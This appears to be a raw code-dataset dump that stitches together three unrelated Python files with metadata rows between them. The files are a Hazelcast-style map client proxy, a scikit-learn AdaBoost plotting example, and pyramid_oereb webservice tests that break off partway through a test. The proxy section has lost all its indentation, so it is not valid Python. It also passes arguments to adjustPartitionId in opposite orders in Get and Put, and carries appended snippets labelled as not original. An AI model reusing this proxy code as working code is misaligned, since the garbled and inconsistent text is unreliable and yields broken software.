msg=mapcodec.MapContainsKeyCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapContainsKeyCodec.decodeResponse(msg2).response
def ContainsValue(self, value):
msg=mapcodec.MapContainsValueCodec.encodeRequest( encode.encodestring(self.title), value)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapContainsValueCodec.decodeResponse(msg2).response
def Delete(self, key, threadId):
msg=mapcodec.MapDeleteCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapDeleteCodec.decodeResponse(msg2)
def EntriesWithPagingPredicate(self, predicate):
msg=mapcodec.MapEntriesWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEntriesWithPagingPredicateCodec.decodeResponse(msg2).entrySet
def EntriesWithPredicate(self, predicate):
msg=mapcodec.MapEntriesWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEntriesWithPredicateCodec.decodeResponse(msg2).entrySet
def EntrySet(self, ):
msg=mapcodec.MapEntrySetCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEntrySetCodec.decodeResponse(msg2).entrySet
def EvictAll(self, ):
msg=mapcodec.MapEvictAllCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEvictAllCodec.decodeResponse(msg2)
def Evict(self, key, threadId):
msg=mapcodec.MapEvictCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapEvictCodec.decodeResponse(msg2).response
def ExecuteOnAllKeys(self, entryProcessor):
msg=mapcodec.MapExecuteOnAllKeysCodec.encodeRequest( encode.encodestring(self.title), entryProcessor)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapExecuteOnAllKeysCodec.decodeResponse(msg2).entrySet
def ExecuteOnKey(self, entryProcessor, key):
msg=mapcodec.MapExecuteOnKeyCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, key)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapExecuteOnKeyCodec.decodeResponse(msg2).response
def ExecuteOnKeys(self, entryProcessor, keys):
msg=mapcodec.MapExecuteOnKeysCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, keys)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapExecuteOnKeysCodec.decodeResponse(msg2).entrySet
def ExecuteWithPredicate(self, entryProcessor, predicate):
msg=mapcodec.MapExecuteWithPredicateCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapExecuteWithPredicateCodec.decodeResponse(msg2).entrySet
def Flush(self, ):
msg=mapcodec.MapFlushCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapFlushCodec.decodeResponse(msg2)
def ForceUnlock(self, key):
msg=mapcodec.MapForceUnlockCodec.encodeRequest( encode.encodestring(self.title), key)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapForceUnlockCodec.decodeResponse(msg2)
def GetAll(self, keys):
msg=mapcodec.MapGetAllCodec.encodeRequest( encode.encodestring(self.title), keys)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapGetAllCodec.decodeResponse(msg2).entrySet
def GetAsync(self, key, threadId):
msg=mapcodec.MapGetAsyncCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapGetAsyncCodec.decodeResponse(msg2).response
def Get(self, key, threadId):
msg=mapcodec.MapGetCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
self.connection.adjustPartitionId(key,msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapGetCodec.decodeResponse(msg2).response
def GetEntryView(self, key, threadId):
msg=mapcodec.MapGetEntryViewCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapGetEntryViewCodec.decodeResponse(msg2).dataEntryView
def IsEmpty(self, ):
msg=mapcodec.MapIsEmptyCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapIsEmptyCodec.decodeResponse(msg2).response
def IsLocked(self, key):
msg=mapcodec.MapIsLockedCodec.encodeRequest( encode.encodestring(self.title), key)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapIsLockedCodec.decodeResponse(msg2).response
def KeySet(self):
msg=mapcodec.MapKeySetCodec.encodeRequest(encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapKeySetCodec.decodeResponse(msg2).set
def KeySetWithPagingPredicate(self, predicate):
msg=mapcodec.MapKeySetWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapKeySetWithPagingPredicateCodec.decodeResponse(msg2).set
def KeySetWithPredicate(self, predicate):
msg=mapcodec.MapKeySetWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapKeySetWithPredicateCodec.decodeResponse(msg2).set
def LoadAll(self, replaceExistingValues):
msg=mapcodec.MapLoadAllCodec.encodeRequest( encode.encodestring(self.title), encode.encodeboolean(replaceExistingValues))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapLoadAllCodec.decodeResponse(msg2)
def LoadGivenKeys(self, keys, replaceExistingValues):
msg=mapcodec.MapLoadGivenKeysCodec.encodeRequest( encode.encodestring(self.title), keys, encode.encodeboolean(replaceExistingValues))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapLoadGivenKeysCodec.decodeResponse(msg2)
def Lock(self, key, threadId, ttl):
msg=mapcodec.MapLockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapLockCodec.decodeResponse(msg2)
def PutAll(self, entries):
msg=mapcodec.MapPutAllCodec.encodeRequest( encode.encodestring(self.title), entries)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutAllCodec.decodeResponse(msg2)
def PutAsync(self, key, value, threadId, ttl):
msg=mapcodec.MapPutAsyncCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutAsyncCodec.decodeResponse(msg2).response
def Put(self, key, value, threadId, ttl):
msg=mapcodec.MapPutCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
self.connection.adjustPartitionId(msg,key)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutCodec.decodeResponse(msg2).response
def PutIfAbsent(self, key, value, threadId, ttl):
msg=mapcodec.MapPutIfAbsentCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutIfAbsentCodec.decodeResponse(msg2).response
def PutTransient(self, key, value, threadId, ttl):
msg=mapcodec.MapPutTransientCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapPutTransientCodec.decodeResponse(msg2)
def RemoveAsync(self, key, threadId):
msg=mapcodec.MapRemoveAsyncCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveAsyncCodec.decodeResponse(msg2).response
def Remove(self, key, threadId):
msg=mapcodec.MapRemoveCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveCodec.decodeResponse(msg2).response
def RemoveEntryListener(self, registrationId):
msg=mapcodec.MapRemoveEntryListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(registrationId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveEntryListenerCodec.decodeResponse(msg2).response
def RemoveIfSame(self, key, value, threadId):
msg=mapcodec.MapRemoveIfSameCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveIfSameCodec.decodeResponse(msg2).response
def RemoveInterceptor(self, id):
msg=mapcodec.MapRemoveInterceptorCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(id))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemoveInterceptorCodec.decodeResponse(msg2).response
def RemovePartitionLostListener(self, registrationId):
msg=mapcodec.MapRemovePartitionLostListenerCodec.encodeRequest( encode.encodestring(self.title), encode.encodestring(registrationId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapRemovePartitionLostListenerCodec.decodeResponse(msg2).response
def Replace(self, key, value, threadId):
msg=mapcodec.MapReplaceCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapReplaceCodec.decodeResponse(msg2).response
def ReplaceIfSame(self, key, testValue, value, threadId):
msg=mapcodec.MapReplaceIfSameCodec.encodeRequest( encode.encodestring(self.title), key, testValue, value, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapReplaceIfSameCodec.decodeResponse(msg2).response
def Set(self, key, value, threadId, ttl):
msg=mapcodec.MapSetCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(ttl))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapSetCodec.decodeResponse(msg2)
def Size(self, ):
msg=mapcodec.MapSizeCodec.encodeRequest( encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
        self.connection.sendPackage(msg.encodeMessage())  # encode the request before sending, as in the other map operations
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapSizeCodec.decodeResponse(msg2).response
def SubmitToKey(self, entryProcessor, key):
msg=mapcodec.MapSubmitToKeyCodec.encodeRequest( encode.encodestring(self.title), entryProcessor, key)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapSubmitToKeyCodec.decodeResponse(msg2).response
def TryLock(self, key, threadId, lease, timeout):
msg=mapcodec.MapTryLockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(lease), encode.encodeint64(timeout))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapTryLockCodec.decodeResponse(msg2).response
def TryPut(self, key, value, threadId, timeout):
msg=mapcodec.MapTryPutCodec.encodeRequest( encode.encodestring(self.title), key, value, encode.encodeint64(threadId), encode.encodeint64(timeout))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapTryPutCodec.decodeResponse(msg2).response
def TryRemove(self, key, threadId, timeout):
msg=mapcodec.MapTryRemoveCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId), encode.encodeint64(timeout))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapTryRemoveCodec.decodeResponse(msg2).response
def Unlock(self, key, threadId):
msg=mapcodec.MapUnlockCodec.encodeRequest( encode.encodestring(self.title), key, encode.encodeint64(threadId))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapUnlockCodec.decodeResponse(msg2)
def Values(self):
msg=mapcodec.MapValuesCodec.encodeRequest(encode.encodestring(self.title))
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapValuesCodec.decodeResponse(msg2).list
def ValuesWithPagingPredicate(self, predicate):
msg=mapcodec.MapValuesWithPagingPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapValuesWithPagingPredicateCodec.decodeResponse(msg2).entrySet
def ValuesWithPredicate(self, predicate):
msg=mapcodec.MapValuesWithPredicateCodec.encodeRequest( encode.encodestring(self.title), predicate)
retryable=msg.retryable
self.connection.adjustCorrelationId(msg)
correlationid=msg.correlation
self.connection.sendPackage(msg.encodeMessage())
response=self.connection.getPackageWithCorrelationId(correlationid,retryable)
msg2=ClientMessage.decodeMessage(response)
return mapcodec.MapValuesWithPredicateCodec.decodeResponse(msg2).list | 61.28051 | 175 | 0.76099 |
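# The methods above all repeat the same flow: encode a request, tag it with a
# correlation id, send it, wait for the matching response, decode it. A minimal
# sketch (not part of the original file) of how that shared flow could be factored
# out, using only the connection/ClientMessage calls already seen above:
def invoke(connection, msg):
    retryable = msg.retryable
    connection.adjustCorrelationId(msg)
    correlationid = msg.correlation
    connection.sendPackage(msg.encodeMessage())
    response = connection.getPackageWithCorrelationId(correlationid, retryable)
    return ClientMessage.decodeMessage(response)
# A proxy method would then reduce to roughly:
#   msg = mapcodec.MapSizeCodec.encodeRequest(encode.encodestring(self.title))
#   return mapcodec.MapSizeCodec.decodeResponse(invoke(self.connection, msg)).response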
39e7cdcb8ef4d17fcaeaefc7bf1131478de86552 | 4,124 | py | Python | scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py | RTHMaK/git-squash-master | 76c4c8437dd18114968e69a698f4581927fcdabf | [
"BSD-2-Clause"
] | 1 | 2021-11-26T12:22:13.000Z | 2021-11-26T12:22:13.000Z | scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py | RTHMaK/git-squash-master | 76c4c8437dd18114968e69a698f4581927fcdabf | [
"BSD-2-Clause"
] | null | null | null | scikit-learn-weighted_kde/examples/ensemble/plot_adaboost_multiclass.py | RTHMaK/git-squash-master | 76c4c8437dd18114968e69a698f4581927fcdabf | [
"BSD-2-Clause"
] | null | null | null | """
=====================================
Multi-class AdaBoosted Decision Trees
=====================================
This example reproduces Figure 1 of Zhu et al [1] and shows how boosting can
improve prediction accuracy on a multi-class problem. The classification
dataset is constructed by taking a ten-dimensional standard normal distribution
and defining three classes separated by nested concentric ten-dimensional
spheres such that roughly equal numbers of samples are in each class (quantiles
of the :math:`\chi^2` distribution).
The performance of the SAMME and SAMME.R [1] algorithms are compared. SAMME.R
uses the probability estimates to update the additive model, while SAMME uses
the classifications only. As the example illustrates, the SAMME.R algorithm
typically converges faster than SAMME, achieving a lower test error with fewer
boosting iterations. The error of each algorithm on the test set after each
boosting iteration is shown on the left, the classification error on the test
set of each tree is shown in the middle, and the boost weight of each tree is
shown on the right. All trees have a weight of one in the SAMME.R algorithm and
therefore are not shown.
.. [1] J. Zhu, H. Zou, S. Rosset, T. Hastie, "Multi-class AdaBoost", 2009.
"""
print(__doc__)
# Author: Noel Dawe <noel.dawe@gmail.com>
#
# License: BSD 3 clause
from sklearn.externals.six.moves import zip
import matplotlib.pyplot as plt
from sklearn.datasets import make_gaussian_quantiles
from sklearn.ensemble import AdaBoostClassifier
from sklearn.metrics import accuracy_score
from sklearn.tree import DecisionTreeClassifier
X, y = make_gaussian_quantiles(n_samples=13000, n_features=10,
n_classes=3, random_state=1)
n_split = 3000
X_train, X_test = X[:n_split], X[n_split:]
y_train, y_test = y[:n_split], y[n_split:]
bdt_real = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=2),
n_estimators=600,
learning_rate=1)
bdt_discrete = AdaBoostClassifier(
DecisionTreeClassifier(max_depth=2),
n_estimators=600,
learning_rate=1.5,
algorithm="SAMME")
bdt_real.fit(X_train, y_train)
bdt_discrete.fit(X_train, y_train)
real_test_errors = []
discrete_test_errors = []
for real_test_predict, discrete_train_predict in zip(
bdt_real.staged_predict(X_test), bdt_discrete.staged_predict(X_test)):
real_test_errors.append(
1. - accuracy_score(real_test_predict, y_test))
discrete_test_errors.append(
1. - accuracy_score(discrete_train_predict, y_test))
n_trees_discrete = len(bdt_discrete)
n_trees_real = len(bdt_real)
# Boosting might terminate early, but the following arrays are always
# n_estimators long. We crop them to the actual number of trees here:
discrete_estimator_errors = bdt_discrete.estimator_errors_[:n_trees_discrete]
real_estimator_errors = bdt_real.estimator_errors_[:n_trees_real]
discrete_estimator_weights = bdt_discrete.estimator_weights_[:n_trees_discrete]
plt.figure(figsize=(15, 5))
plt.subplot(131)
plt.plot(range(1, n_trees_discrete + 1),
discrete_test_errors, c='black', label='SAMME')
plt.plot(range(1, n_trees_real + 1),
real_test_errors, c='black',
linestyle='dashed', label='SAMME.R')
plt.legend()
plt.ylim(0.18, 0.62)
plt.ylabel('Test Error')
plt.xlabel('Number of Trees')
plt.subplot(132)
plt.plot(range(1, n_trees_discrete + 1), discrete_estimator_errors,
"b", label='SAMME', alpha=.5)
plt.plot(range(1, n_trees_real + 1), real_estimator_errors,
"r", label='SAMME.R', alpha=.5)
plt.legend()
plt.ylabel('Error')
plt.xlabel('Number of Trees')
plt.ylim((.2,
max(real_estimator_errors.max(),
discrete_estimator_errors.max()) * 1.2))
plt.xlim((-20, len(bdt_discrete) + 20))
plt.subplot(133)
plt.plot(range(1, n_trees_discrete + 1), discrete_estimator_weights,
"b", label='SAMME')
plt.legend()
plt.ylabel('Weight')
plt.xlabel('Number of Trees')
plt.ylim((0, discrete_estimator_weights.max() * 1.2))
plt.xlim((-20, n_trees_discrete + 20))
# prevent overlapping y-axis labels
plt.subplots_adjust(wspace=0.25)
plt.show()
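# Not part of the original example: a quick check of the final fitted models using the
# standard scikit-learn predict API, printing the end-of-training test error of each
# boosting variant alongside the staged errors plotted above.
print("SAMME.R final test error: %.3f"
      % (1. - accuracy_score(y_test, bdt_real.predict(X_test))))
print("SAMME final test error:   %.3f"
      % (1. - accuracy_score(y_test, bdt_discrete.predict(X_test))))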
| 34.082645 | 79 | 0.738118 |
ccfa8ea3f336b03b3ce0ce5baafc754ab34b5ff8 | 8,302 | py | Python | tests/webservice/test_getegrid.py | danduk82/pyramid_oereb | 4544ef81371aabd2a2f0759c2073f2ca51f85ff7 | [
"BSD-2-Clause"
] | null | null | null | tests/webservice/test_getegrid.py | danduk82/pyramid_oereb | 4544ef81371aabd2a2f0759c2073f2ca51f85ff7 | [
"BSD-2-Clause"
] | 2 | 2019-11-22T16:32:47.000Z | 2019-12-03T07:31:02.000Z | tests/webservice/test_getegrid.py | danduk82/pyramid_oereb | 4544ef81371aabd2a2f0759c2073f2ca51f85ff7 | [
"BSD-2-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
import json
import math
from jsonschema import Draft4Validator
from shapely.geometry import Point, Polygon, MultiPolygon
import pytest
from pyramid.httpexceptions import HTTPBadRequest, HTTPNoContent
from pyramid_oereb.lib.records.real_estate import RealEstateRecord
from pyramid_oereb.lib.records.view_service import ViewServiceRecord
from tests import schema_json_extract, pyramid_oereb_test_config
from tests.mockrequest import MockRequest
from pyramid_oereb.views.webservice import PlrWebservice
def test_getegrid_coord_missing_parameter():
webservice = PlrWebservice(MockRequest())
with pytest.raises(HTTPBadRequest):
webservice.get_egrid_coord()
def test_getegrid_ident():
with pyramid_oereb_test_config():
request = MockRequest(current_route_url='http://example.com/oereb/getegrid/json/BLTEST/1000')
# Add params to matchdict as the view will do it for /getegrid/{format}/{identdn}/{number}
request.matchdict.update({
'format': u'json',
'identdn': u'BLTEST',
'number': u'1000'
})
webservice = PlrWebservice(request)
response = webservice.get_egrid_ident().json
with open(schema_json_extract) as f:
schema = json.loads(f.read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema)
validator.validate(response)
assert isinstance(response, dict)
real_estates = response.get('GetEGRIDResponse')
assert isinstance(real_estates, list)
assert len(real_estates) == 1
assert real_estates[0]['egrid'] == u'TEST'
assert real_estates[0]['number'] == u'1000'
assert real_estates[0]['identDN'] == u'BLTEST'
def test_getegrid_xy():
with pyramid_oereb_test_config():
url = 'http://example.com/oereb/getegrid/json/?XY=-1999999.032739449,-999998.940457533'
request = MockRequest(
current_route_url=url
)
# Add params to matchdict as the view will do it for /getegrid/{format}/
request.matchdict.update({
'format': u'json'
})
request.params.update({
'XY': '-1999999.032739449,-999998.940457533'
})
webservice = PlrWebservice(request)
response = webservice.get_egrid_coord().json
with open(schema_json_extract) as f:
schema = json.loads(f.read())
Draft4Validator.check_schema(schema)
validator = Draft4Validator(schema)
validator.validate(response)
assert isinstance(response, dict)
real_estates = response.get('GetEGRIDResponse')
assert isinstance(real_estates, list)
assert len(real_estates) == 2
assert real_estates[0]['egrid'] == u'TEST'
assert real_estates[0]['number'] == u'1000'
assert real_estates[0]['identDN'] == u'BLTEST'
def test_getegrid_gnss():
with pyramid_oereb_test_config():
request = MockRequest(
current_route_url='http://example.com/oereb/getegrid/json/?GNSS=-19.917989937473,32.1244978460310'
)
# Add params to matchdict as the view will do it for /getegrid/{format}/
